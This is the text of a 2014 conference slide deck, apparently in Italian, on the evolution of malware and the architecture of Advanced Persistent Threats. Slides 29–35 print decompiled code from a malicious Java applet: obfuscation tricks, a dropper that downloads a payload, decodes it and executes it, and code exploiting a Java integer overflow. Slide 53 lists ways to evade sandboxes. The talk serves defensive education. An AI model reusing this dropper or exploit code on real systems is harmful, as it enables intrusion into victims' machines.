Anche il business dei crimini informatici ha le sue innovazioni, e l'evoluzione riguarda servizi di botnet in affitto o self-contruction kit per la realizzazione di malware adatti per qualsiasi occasione. In questa consumerizzazione del crimine l'attenzione si sposta quindi sui client, per exploitare la fiducia dell'ignara vittima e ottenere le informazioni di interesse. Come funzionano le nuove campagne di attacco? Quali stratagemmi utilizzano? Come rilevarli? Il mondo delle guest image e la loro rapida e innovativa evoluzione, i progetti open, ma anche i limiti da prendere in considerazione.
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion Milan 2014
1. Page ‹N›
Andrea Pompili
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
THE MAGIC WORLD OF
ADVANCED PERSISTENT THREATS
There are only 10 types
of people in the world:
Those who understand binary,
and those who don't
apompili@hotmail.com
2. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Attacker Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
3. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Come si sviluppa un attacco?
<#1>
<#2>
<#3>
4. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
5. Page ‹N›
<2000>
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
8,7 miliardi di dollari
6. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
7. 635 milioni di dollari
Page ‹N›
Microsoft IE MIME Header Attachment
TFTP Server Execution Vulnerability
UDP:69
Microsoft IE MIME Header Attachment Execution Vulnerability
Microsoft Office 2000 DLL Execution Vulnerability
RICHED20.DLL
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2001> The Nimda Style
Microsoft IIS e PWS Extended Unicode Directory transversal Vulnerability
8. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
9. 75.000 computer infettati in soli 10 minuti
Page ‹N›
payload di soli 376 byte (residente esclusivamente in memoria)
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
1,2 miliardi di dollari
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
SQL Server 2000 Desktop Engine
10. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
11. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Backdoor TCP 3127-3198
http://echohacker.altervista.org/articoli/mydoom.html
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
22,6 miliardi di dollari
DDOS contro www.sco.com
0x85 0x13 0x3c 0x9e 0xa2 Upload&Execute
12. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
13. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
14. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Flame: Il Malware più complesso della storia
> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)
> 80 domini utilizzati come sistemi di Comando e Controllo
> Diffusione via USB Stick (Infectmedia)
> Enumerazione dei dispositivi
Bluetooth (Beetlejuice)
> Registrazione audio (Microbe)
> Windows Update MITM
(Munch & Gadget)
MD5 Collision Attack
15. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target
16. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
17. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target
#6> La somma fa sempre il Totale
18. Page ‹N›
« »
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
19. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
A General APT Architecture
Andrea Pompili
Command & Control
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Dropper
Launcher
Downloader
Module
Exploit
Vector
Module <01>
Infection Stage
Malware Core
Module <XX>
20. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> The Botnet Choice
21. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#1>
22. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#2>
23. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Infection Stage> Drive-to-Click <#3>
24. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Drive-to-Click <#5>
25. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Trick#1> Giochiamo con le estensioni
RLO Unicode control character
26. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
27. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Exploiting> The same old story
> Old Client Vulnerabilities
> Disclosed Client Vulnerabilities without a Patch
> 0-Day Exploit
> 1-Day Exploit PoC
28. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Make or Buy?
29. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
A Security day
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<applet codebase=“http://blahblah.evilsite.in/hiddenpath/"
archive=“http://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9” code=“rgmiv”>
30. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
31. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
Malware
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
32. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
Malware
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/
BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
33. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
34. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
...
private static void lcsqyrgtbct (String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel= Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos= new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class
35. Page ‹N›
http://valhalla.allalla.com/2013/08/
java-netbeans-applet-integer-overflow-win32-target-added/
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
The Malware Core
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte obj10 = new byte[] {0, -1}
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
36. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Cheaper Path to Exploiting
Blackole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-
kit.html
Magnitude Exploit Kit
http://malware.dontneedcoffee.com/2013/10/Magnitude.html
37. Page ‹N›
A General APT Architecture (Exploit Kit)
Downloader Downloader
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Downloader
Exploit 01
Vector
Infection Stage
Exploit 02 Exploit n
38. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The InfoStealer Choice
39. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The RAT Choice
40. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Bitcoin + APT = Ransomware
41. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#1>
42. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#2>
43. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Command&Control Choice <#3>
44. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Why not an Antivirus?
45. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Panic! L encode it
http://upx.sourceforge.net/
46. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Now things goes better
47. Page ‹N›
<2012> The Antivirus Maker Confession
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-resourced
nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
48. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
The Way to Sandboxing
49. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
The Way to Sandboxing
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guest operating system Kernel modified for tracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized Hypervisor to monitor the guest operating system
<04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc.
<05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.
50. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Una lista (molto) parziale dei Player
> Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
51. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
52. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Una lista (completamente) parziale degli Evader
53. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (Something that need to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
54. def: il Paziente Zero è il primo paziente individuato nel
Page ‹N›
campione della popolazione di un'indagine
epidemiologica…
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Il limite delle Sandbox
Minuti
55. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Sicuramente meglio che confidare negli utenti
56. Page ‹N›
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Domande?
Italian
مَطَالِب أَيَّة
Arabic
¿Preguntas?
Spanish
Questions?
English
tupoQghachmey
Klingon
Sindarin
Japanese
Ερωτήσεις?
Greek
вопросы?
Russian